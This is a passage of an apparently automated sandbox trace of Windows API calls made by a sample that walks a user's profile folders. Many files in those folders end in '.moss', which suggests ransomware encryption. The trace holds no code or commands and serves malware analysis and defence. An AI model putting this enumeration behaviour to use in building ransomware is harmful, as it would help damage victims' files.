[0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d59b20, ftCreationTime.dwHighDateTime=0x1d5890f, ftLastAccessTime.dwLowDateTime=0xceab4620, ftLastAccessTime.dwHighDateTime=0x1d57cdf, ftLastWriteTime.dwLowDateTime=0x1bec3200, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x82ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bmVamccT.docx.moss", cAlternateFileName="BMVAMC~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb71f860, ftCreationTime.dwHighDateTime=0x1d5df1c, ftLastAccessTime.dwLowDateTime=0xdd2c72f0, ftLastAccessTime.dwHighDateTime=0x1d5e30f, ftLastWriteTime.dwLowDateTime=0x1bee9360, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0xddd7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bUI6gz9k xvqeKo.xlsx.moss", cAlternateFileName="BUI6GZ~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976494a0, ftCreationTime.dwHighDateTime=0x1d5dbc1, ftLastAccessTime.dwLowDateTime=0xef585fc0, ftLastAccessTime.dwHighDateTime=0x1d5a903, ftLastWriteTime.dwLowDateTime=0x1bf0f4c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x17b02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FORbsqeG8F-z_NR.xlsx.moss", cAlternateFileName="FORBSQ~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fca2e20, ftCreationTime.dwHighDateTime=0x1d58b87, ftLastAccessTime.dwLowDateTime=0x4dee0d80, ftLastAccessTime.dwHighDateTime=0x1d56757, ftLastWriteTime.dwLowDateTime=0x1bf5b780, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x10178, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gG42X1snm-IOrhlP.xlsx.moss", cAlternateFileName="GG42X1~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x739ee340, ftCreationTime.dwHighDateTime=0x1d5dda6, ftLastAccessTime.dwLowDateTime=0xf173ea00, ftLastAccessTime.dwHighDateTime=0x1d5e31d, ftLastWriteTime.dwLowDateTime=0x1bf818e0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x6262, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Kb5b.csv.moss", cAlternateFileName="KB5BCS~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab2fa80, ftCreationTime.dwHighDateTime=0x1d5dbae, ftLastAccessTime.dwLowDateTime=0x939f2aa0, ftLastAccessTime.dwHighDateTime=0x1d5e013, ftLastWriteTime.dwLowDateTime=0x1bfa7a40, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x94d3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kX0JIZYtRxGkB.pdf.moss", cAlternateFileName="KX0JIZ~1.MOS")) returned 1 [0173.894] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0173.894] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0180 | out: hHeap=0x2c0000) returned 1 [0173.895] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.895] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0173.895] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.895] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.895] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.895] PathFindFileNameW (pszPath="") returned="" [0173.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0458 | out: hHeap=0x2c0000) returned 1 [0173.895] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.895] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0173.895] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0173.896] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0180 | out: hHeap=0x2c0000) returned 1 [0173.896] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.896] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0173.896] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.896] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.896] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.896] PathFindFileNameW (pszPath="") returned="" [0173.896] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0458 | out: hHeap=0x2c0000) returned 1 [0173.896] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.897] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0173.897] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1ce883c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1ce883c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0173.897] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0180 | out: hHeap=0x2c0000) returned 1 [0173.897] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.897] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="Links\\" [0173.897] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.897] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.897] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.897] PathFindFileNameW (pszPath="") returned="" [0173.897] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.897] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.897] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0173.897] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0173.898] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0173.898] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0173.898] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0173.898] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cc28 | out: hHeap=0x2c0000) returned 1 [0173.898] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.898] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="Local Settings\\" [0173.898] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.898] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.898] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.898] PathFindFileNameW (pszPath="") returned="" [0173.898] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0173.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff10 | out: hHeap=0x2c0000) returned 1 [0173.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa0180 | out: hHeap=0x2c0000) returned 1 [0173.898] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.899] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0173.899] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.899] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59880 | out: hHeap=0x2c0000) returned 1 [0173.899] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.899] PathFindFileNameW (pszPath="") returned="" [0173.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c2c7720, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c2c7720, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c1d8 | out: hHeap=0x2c0000) returned 1 [0173.899] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1c2c7720, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1c2c7720, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.899] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9cfe8d0, ftCreationTime.dwHighDateTime=0x1d5d8d4, ftLastAccessTime.dwLowDateTime=0xd49fe120, ftLastAccessTime.dwHighDateTime=0x1d5db72, ftLastWriteTime.dwLowDateTime=0x1c22f1a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x2c67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CsANIO3.m4a.moss", cAlternateFileName="CSANIO~1.MOS")) returned 1 [0173.899] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6e99320, ftCreationTime.dwHighDateTime=0x1d5e2fe, ftLastAccessTime.dwLowDateTime=0x1d0c3860, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1d0c3860, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D99YKJDL-0LajD", cAlternateFileName="D99YKJ~1")) returned 1 [0173.899] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.899] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.899] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0173.899] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.899] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.900] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.900] PathFindFileNameW (pszPath="") returned="" [0173.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0x1c2c7720, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x72b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a.moss", cAlternateFileName="_KGVE1~1.MOS")) returned 0xffffffff [0173.900] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0173.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.900] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.900] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.900] PathFindFileNameW (pszPath="") returned="" [0173.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8c930, ftCreationTime.dwHighDateTime=0x1d5e557, ftLastAccessTime.dwLowDateTime=0xc8f76b70, ftLastAccessTime.dwHighDateTime=0x1d5e0dd, ftLastWriteTime.dwLowDateTime=0x1c2c7720, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x72b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Kgve1.m4a.moss", cAlternateFileName="_KGVE1~1.MOS")) returned 0xffffffff [0173.900] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0173.900] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.900] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.901] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.901] PathFindFileNameW (pszPath="") returned="" [0173.901] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd9947fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd9947fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.901] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.901] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.901] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS 